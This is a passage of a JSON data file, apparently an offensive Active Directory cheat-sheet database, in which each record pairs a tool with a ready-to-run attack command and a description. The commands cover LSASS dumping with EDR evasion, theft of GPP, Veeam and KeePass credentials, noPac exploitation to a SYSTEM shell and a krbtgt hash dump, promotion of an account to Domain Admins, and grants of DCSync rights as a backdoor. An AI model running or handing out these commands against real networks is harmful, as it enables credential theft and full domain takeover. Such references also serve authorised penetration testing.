default)","mitre":["T1556.001"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://adsecurity.org/?p=1275","https://attack.mitre.org/techniques/T1556/001/"],"added":true},{"id":"wadcoms:Nanodump-LSASS","toolId":"wadcoms:Nanodump","toolName":"Nanodump","name":"Nanodump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Defense Evasion"],"nativeCategory":["Credential Access","Defense Evasion"],"command":"nanodump.x64.exe --fork --valid --write C:\\Windows\\Temp\\lsass.dmp","description":"Nanodump is an OPSEC-aware LSASS dumper that reads process memory and writes a minidump without calling the heavily monitored MiniDumpWriteDump API, avoiding many EDR hooks. --fork clones the LSASS process and dumps the copy to reduce detection, and --valid restores the dump's signature so pypykatz or Mimikatz can parse it (nanodump writes an invalid signature by default to evade disk scanners). It requires local administrator / SeDebugPrivilege; exfil the dump and parse it offline.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/fortra/nanodump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:NetExec-LDAP-ADCS","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-ADCS","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Enumerate Enterprise CAs and certificate templates over LDAP\nnxc ldap 10.10.10.1 -u john -p password123 -M adcs","description":"The NetExec (nxc) ldap module -M adcs enumerates Active Directory Certificate Services by querying the Configuration partition over LDAP, listing the Enterprise CAs and the certificate templates published in the domain. It is a quick way to confirm AD CS is present and to gather CA and template names before running Certipy to hunt for vulnerable (ESC) configurations. Requires any valid domain account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/Pennyw0rth/NetExec","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://posts.specterops.io/certified-pre-owned-d95910965cd2"],"added":true},{"id":"wadcoms:NetExec-LDAP-MAQ","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-MAQ","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Read ms-DS-MachineAccountQuota (how many computer accounts this user may add)\nnxc ldap 10.10.10.1 -u john -p password123 -M maq\n# Confirm the authenticated identity / domain SID\nnxc ldap 10.10.10.1 -u john -p password123 -M whoami","description":"The NetExec (nxc) ldap module -M maq reads the ms-DS-MachineAccountQuota attribute, revealing how many computer accounts an authenticated user is allowed to create (default 10). A non-zero quota is a prerequisite for attacks that need a controlled computer object, such as Resource-Based Constrained Delegation (RBCD) and Shadow Credentials. The -M whoami module confirms the authenticated context and domain SID. Both need only a valid low-privileged account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/ldap-protocol/enumerate-machineaccountquota","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:NetExec-MSSQL-CmdExec","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-CmdExec","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Lateral Movement"],"nativeCategory":["Exploitation","Lateral Movement"],"command":"# OS command via xp_cmdshell\nnxc mssql 10.10.10.1 -u john -p password123 -x \"whoami /all\"\n\n# PowerShell command\nnxc mssql 10.10.10.1 -u john -p password123 -X \"$PSVersionTable\"","description":"NetExec's mssql -x runs an operating-system command through xp_cmdshell (it will enable the option automatically if the login is sysadmin), returning stdout. Use -X instead to execute a PowerShell command block. Command execution runs as the SQL Server service account and requires sysadmin; enabling xp_cmdshell is a high-signal event.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/command-execution","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-MSSQL-LocalAuth","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-LocalAuth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Lateral Movement"],"nativeCategory":["Credential Access","Lateral Movement"],"command":"# Local SQL login (e.g. sa) rather than domain auth\nnxc mssql 10.10.10.1 -u sa -p password123 --local-auth\n\n# Spray a local sa password across a subnet\nnxc mssql 10.10.10.0/24 -u sa -p password123 --local-auth","description":"With --local-auth, NetExec authenticates the SQL Server login as a local (mixed-mode) account instead of a domain principal — the classic case being the sa account or a recovered application login. This is useful for password spraying a reused sa password across many hosts, or logging into an instance that is not domain-joined. Combine with -q, -x, or a module once authenticated.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: sa\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/authentication","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-MSSQL-Priv","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-Priv","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Enumerate impersonation / db_owner privesc paths\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv\n\n# Escalate the current login to sysadmin\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv -o ACTION=privesc","description":"The mssql_priv NetExec module enumerates and abuses privilege-escalation paths inside a SQL Server instance — principals the login can impersonate (EXECUTE AS / IMPERSONATE), and db_owner membership on databases owned by a high-privileged principal. Run it with no options to enumerate available paths; run it with ACTION=privesc to walk the chain and grant the current login sysadmin. Add ACTION=rollback to undo the change afterwards.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/mssql-privesc","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-MSSQL-Query","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-Query","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"nxc mssql 10.10.10.1 -u john -p password123 -q \"SELECT @@version\"\n\n# domain (Windows) auth\nnxc mssql 10.10.10.1 -u john -p password123 --windows-auth -q \"SELECT SYSTEM_USER\"","description":"NetExec's mssql protocol authenticates to SQL Server and runs an arbitrary T-SQL statement with -q/--query, printing the result set. It is the quickest way to fingerprint an instance (@@version), enumerate databases, or check the effective privileges of the login. Add -windows-auth to authenticate the domain account over NTLM rather than SQL auth.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/authentication","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-noPac","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec nopac Module","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M nopac","description":"The NetExec/nxc smb 'nopac' module automates the CVE-2021-42278 + CVE-2021-42287 sAMAccountName spoofing chain from a single authenticated SMB connection. It confirms the DC is vulnerable, creates and renames a machine account, and requests an impersonating service ticket, saving the resulting ccache to disk for reuse with impacket tools. Requires MachineAccountQuota > 0 and a DC missing the November 2021 patches; it is a fast way to validate the primitive during an engagement.\n\nCommand Reference:\n\n\tDomain / DC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB","Kerberos","LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true},{"id":"wadcoms:NetExec-SMB-GPPAutologin","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-GPPAutologin","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M gpp_autologin","description":"The gpp_autologin module parses Registry.xml files pushed through Group Policy Preferences in SYSVOL and extracts autologon credentials (DefaultUserName / DefaultPassword) configured for interactive logon. Unlike cpassword these values are stored in cleartext, so no decryption is needed. Any domain account can read SYSVOL, making this a fast credential-hunting check against the domain controller alongside gpp_password.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":["T1552.006"],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/"],"added":true},{"id":"wadcoms:NetExec-SMB-GPPPassword","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-GPPPassword","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M gpp_password","description":"The gpp_password module searches SYSVOL for Group Policy Preferences XML files (Groups.xml, Services.xml, ScheduledTasks.xml, etc.) that contain a cpassword attribute, then decrypts it using the AES key Microsoft published in MSDN. Any authenticated domain user can read SYSVOL, so this is a classic quick win for recovering local admin or service account passwords set via GPP. Microsoft patched (MS14-025) the ability to create new GPP passwords but did not remove existing ones, so legacy cpassword values still linger in many domains.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":["T1552.006"],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/"],"added":true},{"id":"wadcoms:NetExec-SMB-KeePassDiscover","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-KeePassDiscover","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M keepass_discover","description":"The keepass_discover module remotely enumerates a target for running KeePass processes and for KeePass.config.xml configuration files, reporting the paths it finds. This is the reconnaissance step before keepass_trigger: you need the config file path to plant a malicious export trigger. Requires local admin on the target so the module can inspect processes and the user's AppData. No database is opened or modified at this stage.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass"],"added":true},{"id":"wadcoms:NetExec-SMB-KeePassTrigger","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-KeePassTrigger","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M keepass_trigger -o KEEPASS_CONFIG_PATH=\"C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml\"","description":"The keepass_trigger module abuses KeePass's trigger system: it edits KeePass.config.xml (path found via keepass_discover) to add a malicious export trigger, so the next time the victim unlocks their database KeePass silently exports every entry in cleartext to a location the operator can read. The default ACTION=ALL adds the trigger, waits, retrieves and parses the export, then cleans up. Requires local admin on the host and that the user actually opens their vault; it is noisier and higher-risk than passive hunting, so restore the config afterward.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n\n\tKeePass config path: C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass"],"added":true},{"id":"wadcoms:NetExec-SMB-SpiderPlus","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-SpiderPlus","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Discovery"],"nativeCategory":["Collection","Discovery"],"command":"# JSON share/file inventory only (metadata, no downloads)\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus\n\n# Download every readable file under the size limit\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus -o DOWNLOAD_FLAG=True","description":"The spider_plus module walks every share the authenticated user can read and writes a per-host JSON inventory of file metadata (path, size, ctime/mtime/atime) to the output folder, giving you a fast triage map of what exists before you pull anything down. By default it only catalogs; setting DOWNLOAD_FLAG=True makes it copy files under MAX_FILE_SIZE to the loot folder. Prefer the metadata-only run first to stay quiet and avoid mass file reads. Good starting point for share enumeration at scale with a single low-priv credential.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/spidering-shares"],"added":true},{"id":"wadcoms:NetExec-SMB-Veeam","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Veeam","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M veeam","description":"The veeam module locates a Veeam Backup & Replication configuration database on the target, reads the stored credential records and decrypts them, recovering the accounts Veeam uses for backups (often domain or local admin). Because backup servers are commonly configured with highly privileged service accounts, this is a frequent path to escalation. Requires local admin on the Veeam server so the module can reach the backing SQL database and DPAPI material.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/veeam"],"added":true},{"id":"wadcoms:Nltest-DomainTrusts-Discovery","toolId":"wadcoms:Nltest","toolName":"Nltest","name":"Nltest-DomainTrusts-Discovery","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Discovery","Enumeration"],"command":"# List all trust relationships in the forest\nnltest /domain_trusts /all_trusts\n# Enumerate domain controllers for the domain\nnltest /dclist:test.local","description":"nltest.exe is a signed Windows built-in (living-off-the-land) used to map trust relationships and locate domain controllers from an existing foothold, with no third-party tooling dropped to disk. /domain_trusts /all_trusts lists every trust relationship in the forest, and /dclist:<domain> enumerates the DCs for a domain - both useful for planning cross-domain and cross-forest movement. It runs in the current user's context on any domain-joined host.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":["T1482"],"requires":["Shell"],"services":["LDAP","Kerberos"],"references":["https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)","https://attack.mitre.org/techniques/T1482/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:noPac-SAMSpoof","toolId":"wadcoms:noPac","toolName":"noPac","name":"noPac (CVE-2021-42278 + CVE-2021-42287)","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Credential Access"],"nativeCategory":["PrivEsc","Exploitation","Credential Access"],"command":"# Interactive SYSTEM shell on the DC\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -shell\n\n# Dump the krbtgt hash via secretsdump\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -dump -just-dc-user krbtgt","description":"noPac.py (Ridter) chains CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion) to escalate from a low-privileged domain user to SYSTEM on the Domain Controller. It adds a new machine account, renames its sAMAccountName to match the DC (dropping the trailing $), requests a TGT, restores the name, then performs S4U2self to obtain a service ticket impersonating a Domain Admin. Requires MachineAccountQuota > 0 (default 10) and a DC unpatched against the November 2021 fixes. Use -shell for an interactive SYSTEM shell via smbexec or -dump to run secretsdump against the DC.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1\n\n\tDC host: DC01\n\n\tImpersonate: administrator","mitre":[],"requires":["Username","Password"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:noPac-Scanner","toolId":"wadcoms:noPac","toolName":"noPac","name":"noPac Vulnerability Scanner","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"python3 scanner.py test.local/john:password123 -dc-ip 10.10.10.1 -use-ldap","description":"scanner.py ships with Ridter's noPac and safely checks whether a Domain Controller is exploitable via the sAMAccountName spoofing chain without adding or renaming any accounts. It authenticates as a normal domain user and reports the current MachineAccountQuota and whether the DC is patched against CVE-2021-42278 / CVE-2021-42287. Run it first as a low-noise reconnaissance step before launching the full noPac.py exploit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","LDAP","SMB"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true},{"id":"wadcoms:PowerMad-NewMachineAccount","toolId":"wadcoms:PowerMad","toolName":"PowerMad","name":"PowerMad-NewMachineAccount","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Import Powermad and create a new machine account\nImport-Module .\\Powermad.ps1\nNew-MachineAccount -MachineAccount EVILPC -Password $(ConvertTo-SecureString 'password123' -AsPlainText -Force)","description":"Powermad's New-MachineAccount cmdlet creates a new computer account in the domain over LDAP/SAMR from a Windows foothold, abusing the default ms-DS-MachineAccountQuota (10) that lets any authenticated user add machine accounts. The resulting account, with a password you supply, is the controlled principal for RBCD and shadow-credential chains carried out with SharpAllowedToAct or Rubeus. Run it in-session as any domain user; verify the quota is non-zero first.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tNew machine account: EVILPC\n\n\tPassword: password123","mitre":[],"requires":["PowerShell","Shell"],"services":["LDAP"],"references":["https://github.com/Kevin-Robertson/Powermad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"added":true},{"id":"wadcoms:PowerUpSQL-Get-SQLServerLinkCrawl","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-Get-SQLServerLinkCrawl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Lateral Movement"],"nativeCategory":["PrivEsc","Lateral Movement"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Crawl all linked servers from the starting instance\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')\"\n\n# Run an OS command on any node that allows it\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"exec master..xp_cmdshell 'whoami'\"","description":"Get-SQLServerLinkCrawl recursively follows linked-server definitions from a starting instance, executing a query at every hop via OPENQUERY chains. Because linked servers frequently run under a higher-privileged (often sysadmin) mapped login on the remote side, crawling the graph commonly yields privilege escalation or lateral movement to instances the operator could not reach directly. Supply -Query to fingerprint each node, or drive command execution through xp_cmdshell across the chain.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1","mitre":[],"requires":["PowerShell"],"services":["MSSQL"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/how-to-hack-database-links-in-sql-server/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:PowerUpSQL-GetSQLInstanceDomain","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-GetSQLInstanceDomain","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Discovery","Enumeration"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Discover SQL Server instances from SPNs in the domain\nGet-SQLInstanceDomain\n\n# Then test which ones accept the current user\nGet-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose","description":"Get-SQLInstanceDomain queries the domain via LDAP for Service Principal Names beginning with MSSQL*, revealing every registered SQL Server instance and the account it runs as without touching a single database. It is the standard domain-wide MSSQL discovery step and runs under the current user's context from a domain-joined foothold. Pipe the results into Get-SQLConnectionTestThreaded to find which instances your account can actually log into.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["MSSQL","LDAP"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/finding-sensitive-data-domain-sql-servers-powerupsql/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:PowerUpSQL-Invoke-SQLAudit","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-Invoke-SQLAudit","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Audit an instance for privesc issues\nInvoke-SQLAudit -Verbose -Instance 10.10.10.1\n\n# Execute an OS command through the instance\nInvoke-SQLOSCmd -Verbose -Instance 10.10.10.1 -Command \"whoami\"","description":"Invoke-SQLAudit runs PowerUpSQL's battery of privilege-escalation checks against an instance and reports exploitable misconfigurations (impersonation, trustworthy databases, agent jobs, etc.). Where the login already has the rights, Invoke-SQLOSCmd executes an operating-system command through the instance (using xp_cmdshell), returning output. Both take -Instance in HOST\\INSTANCE or HOST,PORT form and use integrated auth by default.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1","mitre":[],"requires":["PowerShell"],"services":["MSSQL"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/establishing-registry-persistence-via-sql-server-powerupsql/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:PowerView-AddDomainGroupMember-DA","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-AddDomainGroupMember-DA","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Import-Module .\\PowerView.ps1\nAdd-DomainGroupMember -Identity 'Domain Admins' -Members john -Verbose\n# Verify\nGet-DomainGroupMember -Identity 'Domain Admins' | select MemberName","description":"Add-DomainGroupMember adds a principal to a group over LDAP, and when you hold write access to the membership of a privileged group (for example via an abusable GenericAll/WriteMembers ACE) this promotes a controlled account straight into Domain Admins. This is a loud, high-impact change that should be reverted with Remove-DomainGroupMember after the objective; it is often paired with -Credential to act as the principal that actually holds the right.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget group: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true},{"id":"wadcoms:PowerView-AddDomainObjectAcl-DCSync","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-AddDomainObjectAcl-DCSync","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Credential Access","Privilege Escalation"],"nativeCategory":["Persistence","Credential Access","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\n# Grant john DCSync replication rights on the domain object\nAdd-DomainObjectAcl -TargetIdentity 'DC=test,DC=local' -PrincipalIdentity john -Rights DCSync -Verbose","description":"Add-DomainObjectAcl grants an ACE on a target object to a principal you control. Targeting the domain head with -Rights DCSync adds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, letting your account replicate secrets (a DCSync attack) without being a Domain Admin. This requires that your current context can already write the domain object's DACL (e.g. WriteDacl on the domain), and it is a durable backdoor that should be cleaned up with Remove-DomainObjectAcl.\n\nCommand Reference:\n\n\tPrincipal granted rights: john\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/grant-rights.html"],"added":true},{"id":"wadcoms:PowerView-ASREPRoastable","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-ASREPRoastable","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\nGet-DomainUser -PreauthNotRequired -Properties samaccountname,useraccountcontrol -Verbose","description":"Get-DomainUser -PreauthNotRequired finds accounts with the DONT_REQ_PREAUTH flag (userAccountControl bit 0x400000), which are AS-REP roastable because a DC will return an encrypted AS-REP without prior authentication. Use it to identify targets whose AS-REP hash you can then crack offline. This is an LDAP read only; the actual roast is performed with a separate tool such as Rubeus or GetNPUsers.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP","Kerberos"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast"],"added":true},{"id":"wadcoms:PowerView-DomainTrust","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-DomainTrust","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\n# Trusts of the current domain\nGet-DomainTrust\n# Forest / inter-forest trusts\nGet-ForestTrust\n# Recursively map every reachable trust\nGet-DomainTrustMapping","description":"Get-DomainTrust enumerates the trust relationships of the current (or a specified) domain, while Get-ForestTrust returns forest-level (inter-forest) trusts. Reading trust direction, transitivity, and SID-filtering state is the first step in planning cross-domain and cross-forest attacks such as foreign group membership abuse or trust-key based ticket forging. Get-DomainTrustMapping walks reachable domains recursively to build the full trust graph.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PowerView-FindLocalAdminAccess","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-FindLocalAdminAccess","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Lateral Movement"],"nativeCategory":["Discovery","Lateral Movement"],"command":"Import-Module .\\PowerView.ps1\nFind-LocalAdminAccess -Verbose | Out-File output.txt","description":"Find-LocalAdminAccess queries the domain for all computers and then, using the OpenServiceControlManager check, tests each one to see whether the current user context has local administrator access. It is the fastest way to discover where your foothold account can already move laterally without cracking anything. The SCM probes generate authentication traffic to many hosts, so it is not stealthy on a monitored network.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt","mitre":[],"requires":["PowerShell"],"services":["SMB"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PowerView-GetDomainObjectAcl","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-GetDomainObjectAcl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Privilege Escalation"],"nativeCategory":["Discovery","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\nGet-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |\n ? { $_.ActiveDirectoryRights -match 'WriteDacl|WriteOwner|GenericAll|GenericWrite' }","description":"Get-DomainObjectAcl returns the raw DACL for a single object so you can confirm exactly which principals hold which rights over a specific user, group, computer, or 